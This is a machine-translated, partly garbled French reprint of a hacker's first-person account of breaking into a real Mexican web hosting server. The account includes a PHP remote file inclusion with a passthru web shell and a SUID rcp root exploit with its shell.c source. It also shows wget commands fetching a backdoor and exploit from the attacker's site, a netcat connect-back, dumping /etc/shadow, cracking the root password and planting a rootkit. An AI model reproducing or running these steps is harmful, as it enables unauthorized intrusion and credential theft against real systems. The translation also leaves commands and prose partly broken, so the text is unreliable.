thème spécial
de la l'

This page has been robot translated, sorry for typos if any. Original content here.

Racine sur le fournisseur d'hébergement Web

Intro.
Je décidai de le décrire est ce hack, car il a eu lieu du tout en ce moment (et, à ce moment - 23.01.03 - le serveur est toujours, pour ainsi dire, dans les mains de DHG) est aussi une commune il y a longtemps, on m'a demandé de décrire certains piratage intéressant.
Je ne voulais pas, que cette histoire était un outil pour les crimes étrangers, de sorte que l'on admet délibérément des erreurs \ inexactitudes (qui, cependant, tout utilisateur avancé remarquerez). Eh bien aussi mâcher des choses de base comme «mon Linux commandes en quel lieu ressembler Campiglio sployty" Nous ne le ferons. Donc là vous allez.

Round # 1: distance.
En général, l'objectif initial était www mexicaine Linux-portail. ***. Com, qui accueillera une fois avec ce fournisseur.
Premièrement, il est nécessaire de connaître l'axe sur lequel se trouve le portail. Bien que, décochez la souche, le site de Linux'e ne peut pas accrocher sur Windows. A http était: "Apache / 1.3.26 (Unix) (Red Hat / Linux) Chili Soft-ASP / 3.6.2 PHP / 4.1.2!", Ftp-banner lire:
managedhosting serveur FTP (Version 6.5 / OpenBSD, port linux 0.3.2) prêt.
ports de numérisation, cgi-bug'i que tous ces non-sens, nous ne sommes pas - ou plutôt, a décidé de reporter à plus tard. Bien que Ipomoea essno couverture ne veut pas. Ainsi, dans le ftp-banner flashé une expression de "l'hébergement"! Notation sur RipNET, nous avons décidé d'aller directement à ip'u qui a www. ***. Com. Il me conduisit vers le site "managedhosting.dialtoneinternet.com.mx", qui, évidemment, était son hôte. Plus tard, un bruteforce'a manuel court a été calculé site d'hébergement réelle: dialtoneinternet.com.mx (www.dialtone.com).
À ce stade, nous avons décidé de rester aussi loin sur le site de la ferraille. Il se tenait sur le PHP-moteur "phpWebSite" version inconnue. Cette autre clone php-nuke'a ne diffère pas un accent particulier sur la sécurité. Toutes les versions jusqu'à 0.8.2 PWS (même marqués Stable) avaient une classe de vulnérabilité 'injection source Php. Ceux qui ont rien qu'il ne dit pas, voir l'article r4ShRaY'ya cette vulnérabilité. Le reste, lisez la suite. Donc, voici un morceau de fichier modsecurity.php Sorsa:

<? Php
$ Inc_prefix mondiale;
if (! $ inc_prefix) {
...
}
...
include_once ($ inc_prefix "htmlheader.php".);
?>

IMHO, tout devrait être clair pour tous. En exécutant ce script comme ceci:
http: //www.***.com/modsecurity.php inc_prefix = http //www.dhgroup.org :?
fichier htmlheader.php couché sur notre site Web, suivre avec poka_neopredelёnnymi_pravami. La seule chose qui me dérange, ce qui est ce que sur le site de la victime est patché, ou une nouvelle espèce (après tout, ce n'est pas une sorte de «page d'accueil de Vassia ', mais un portail pour kewl-Linux-UserZ).
En général, nous avons créé htmlheader.php fichier sur notre site Web le contenu suivant:

<? passthru ( "$ cmd")?>

Puis je suis allé à l'adresse:
modsecurity.php inc_prefix = http :? //www.dhgroup.org&cmd=ls
Ce que nous avons www inscription à l'annuaire. # Note. toutes les équipes vont continuer à griffonner sans "... inc_prefix = http // :? ..."!

Round # 2: local.
> Echo salut> kewl.txt; cat kewl.txt
Sur les données deux équipes navigateur répond vide écran blanc de neige. Ceci indique que les droits d'écriture dans le répertoire www Je n'ai pas. Autrement dit, l'expression de la défiguration encore très tôt. Eh bien, avant que le temps pour prendre d'autres mesures, il était nécessaire de recueillir plus d'informations sur le système. L'occupation principale, nous avons atteint pour le fichier httpd.conf:
> /etc/httpd/conf/httpd.conf Cat
De là, nous a déchiré la version fronika (d'ailleurs, http-tête «Server» est muet sur la disponibilité FrontPage'a) en route vers les répertoires www-sites: dialtoneinternet.com.mx (Loma fournisseur d'hébergement), stormarketing.com, altavistablinds.com, parigitown.com, ainsi, même à quelques ressources importantes:
# -FrontPage- Version = 4.0
##
## Httpd.conf - Apache HTTP fichier de configuration du serveur
##
...
<VirtualHost 66.33.62.88>
<Directory / home / admin / www / serversecure>
options Tous
AllowOverride All
</ Directory>
ServerName dialtoneinternet.com.mx
ServerAlias ​​www.dialtoneinternet.com.mx
DocumentRoot / home / admin / www
ErrorLog logs / error_log
TransferLog logs / transfer_log
personne Groupe
ScriptAlias ​​/ cgi-bin / / home / admin / www / cgi-bin /
</ VirtualHost>
...
Bien sûr, à mutiler leurs droits ne suffit pas, mais ils seront assez, afin de voir le service.pwd de fronikovye (le cas échéant) de ces sites, avec toutes les conséquences qui en découlent;) Cette occasion nous partons à l'aventure, si je reste ne pas être en mesure d'élever leurs privilèges.
En outre, pour l'intérêt, nous avons introduit:
> Netstat -a
Il a reçu (# - mes tags): 
 . Connexions Internet actives (serveurs et établi) Proto Recv-Q Send-Q Adresse locale Adresse État tcp 0 1 66.33.62 *: 2.114 by.ru:www LAST_ACK # (1) tcp 0 0 66.33.62 * :. Www 62.141.75.226:3116 ÉTABLI tcp 0 0 *: www *: * LISTEN tcp 0 0 *: imap2 *: * LISTEN tcp 0 0 *: pop3 *: * LISTEN tcp 0 0 *: ftp *: * LISTEN tcp 0 0 * 81 *: * LISTEN tcp 0 0 *: https *: * LISTEN # (2) tcp 0 0 managedhosting.d: domain *: * LISTEN tcp 0 0 managedhosting2.:domain *: * LISTEN tcp 0 0 spacebattles.net: domaine *: * LISTEN tcp 0 0 66.33.62 * :. domaine *: * LISTEN tcp 0 0 localhost.locald: domain *: * LISTEN tcp 0 0 *: smtp *: * LISTEN tcp 0 0 *: mysql *: * LISTEN tcp 0 0 *: casp3001 *: * LISTEN tcp 0 0 *: casp3000 *: * LISTEN tcp 0 0 *: casp5105 *: * LISTEN tcp 0 0 *: casp5103 *: * LISTEN tcp 0 0 *: casp5104 *: * LISTEN tcp 0 0 * 1581 *: * LISTEN tcp 0 0 * 1024 *: * LISTEN tcp 0 0 *: ssh *: * LISTEN # (3) 0 0 udp *: * 4320: * l'udp 0 0 managedhosting.d : domain *: * udp 0 0 managedhosting2.:domain *: * udp 0 0 spacebattles.net:domain *: * udp 0 0 66.33.62 * :. domaine *: * udp 0 0 localhost.locald: domain *: * brut 0 0 *: udp *: * 7 premières 0 0 *: tcp *: * 7 premières 0 0 *: icmp *: * 7 premières 0 0 *: tcp *: * 7 actifs sockets de domaine UNIX (serveurs et établi) Proto Drapeaux refcnt type État I-Node Chemin unix 0 [ACC] ÉCOUTE STREAM 552.166 /home/httpsd/cache/ssl.socket unix 0 [ACC] STREAM ÉCOUTE 2087 /tmp/mysql.sock unix 4 [] dgram 290 / dev / log unix 0 [ACC] ÉCOUTE STREAM 549 144 / var / run / ndc unix 0 [] STREAM 565 939 unix 0 [] dgram 555692 unix 0 [] dgram 549142 unix 0 [] dgram 3193 unix 0 [] dgram 303
(1) - on =)
(2) - la présence de ssl exprime généralement l'échange de serveur infoy privé (cc, par exemple). Bien que, pour l'hébergement dans les choses quotidiennes.
(3) - ici, il est une coquille! Il est utile de nous plus tard.
Voici les ports d'analyse ne prend pas :)
En outre, il était nécessaire de procéder à des actions spécifiques, ou plutôt, de savoir, même si près de bouchons version plus, sur cette base, doit danser sur. Donc, pour ceux qui ne connaissent pas, certains (sinon tous) les distributions Linux quittent fichier "* -release" (où * - le nom de distributive: mandrake libération, le cobalt-release ...) dans / etc / et les administrateurs ne seront pas avoir à retirer ses habitudes.
> Cat / etc / redhat-release:
Red Hat Linux version 6.1 (Cartman)
Obaaaaa, je dois le dire, nous ne nous attendions :) Tout le reste est bla bla .. il était une question de technique pour atteindre la Ruta attendue depuis longtemps, nous avons décidé juzat RedHat'ovskuyu vulnérabilité rcp.

Red Hat 6.2: trou rcp racine possible
En fait, la vulnérabilité a été trouvée dans le bouchon .. 6.2 Pro 6.1 dans le poste d'Andrew Griffiths Tlabs et pas un mot a été dit. En se fondant sur la chance, nous avons introduit:
> Ls -alF `qui rcp`
-rwsr-xr-x 1 root root 14868 30 juillet 1999 / usr / bin / rcp *
Op! rcp Suidny a la possibilité d'être! Il est déjà bien :) Je me suis versé "rcpsploit.pl" de tlabs plus de capteurs étudiant arrêté. Je pense que je vais vous expliquer comment cela fonctionne sployt - ce sera peut vous aider à comprendre la nature de la vulnérabilité est aussi le problème.
Ainsi, il crée deux fichiers:
/tmp/shell.c---------------------

#include
#include
int main ()
{
setuid (0);
setgid (0);
execl ( "/ bin / sh", "sh", 0);
return 0;
}


hey ------------------------------
Sploit écrit par tlabs, grâce à Andrew Griffiths pour le rapport de bogue

Puis, à travers le suidny rcp, le chmod'om de sployt Campiglio fonctionne également si blah blah suidnym. C'est bien! Exécutez le shell compilé également acquérir un uid shell = 0, gid = 0. Mais quelle est l'utilité de nous cette coquille, si nous exécutons les commandes via un serveur web? : - /
Faire ce travail sployt il a été admis que dans la coquille "normal".
Eh bien, vous avez besoin d'une coquille? Il le fera! Dans ma warez-archive a depuis longtemps pylilsya petite orge Trojan, nous avons également décidé de profiter de:
> Wget -o = / tmp / .tmp.pl http://www.dhgroup.org/exp/backhole.pl
> Chmod 755 /.tmp/tmp.pl
> Perl /tmp/.tmp.pl
Suivant sur votre ordinateur:
> Nc ***. Com 51015
Prikonnektivshis:
> Cd / tmp
> Wget -c http://www.dhgroup.org/exp/rcpsploit.pl
> Chmod 755 rcpsploit.pl; perl rcpsploit.pl
Ok, trop facile, nous allons lancer un shell, laisse espérer la merde allait bien innit :)
> id
uid = 0 (root) gid = 0 (root) groupes = 0 (root), 1 (bin), 2 (démon), 3 (sys), 4 (adm), 6 (disque), 10 (roue)
Ici aussi, toutes :) Eh bien, comme la dernière:
> Cat / etc / shadow
root: ###: 11961: 0: 99999: 7: -1: -1: 134549964
bin: *: 10925: 0: 99999: 7 :::
daemon: *: 10925: 0: 99999: 7 :::
adm: ###: 11577: 0: 99999: 7: -1: -1: 134549852
... Etc ...
JTR compté 977% des mots de passe) Pour accélérer la recherche, nous avons introduit:
john -i: tout -u: root ombre
Quelque part ... 8 heures et le moment tant attendu:




Je me suis alors versé à lrk, plusieurs datapipe'ov Bnc aussi ... bien que ce soit une autre histoire ....

Quel a été utilisé en cas de cambriolage:
Netscape v.xz
SecureCRT 3.1
NetCat
John The Ripper
backhole.pl
rcpsploit.pl
cerveau
PacketStormSecurity

Conclusions \ Notes \ commentaires:
1. Si le serveur ou d'autres appels importants se le fournisseur d'hébergement ou le Linux-portail - cela ne signifie pas qu'il est bien protégé.
2. Dans le processus de piratage ne vaut pas trop à déclarer leur gloire du matin (il devient plus tard plus l'article).
3. Lorsque le cambriolage presque jamais utilisé, soi-disant logiciel "hacker".
4. RH6 * -. Ne pas manger gud :)

PS IMHO, le lecteur peut donner l'impression que je suis juste chanceux et le piratage général prend quelques minutes .. Ce n'est pas le cas. Il y avait des moments où le temps tout simplement lever les bras à quel moment voulu combattre la tête sur le mur.

Auteur: D4rkGr3y


Le matériel est publié avec la permission de DHGROUP (http://www.dhgroup.org)
Vous aimez? Abonnez - vous à RSS nouvelles!
Vous pouvez également soutenir shram.kiev.ua, cliquez sur:

Ne soyez pas mal à vos amis et trouver cette information, partager avec eux l'article!

Développer / Réduire la boîte de commentaires avec

Commentaires

Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.
PLAINTE
Gratuit Carte de crédit avec une limite de 15.000 USD.
fermer forum principal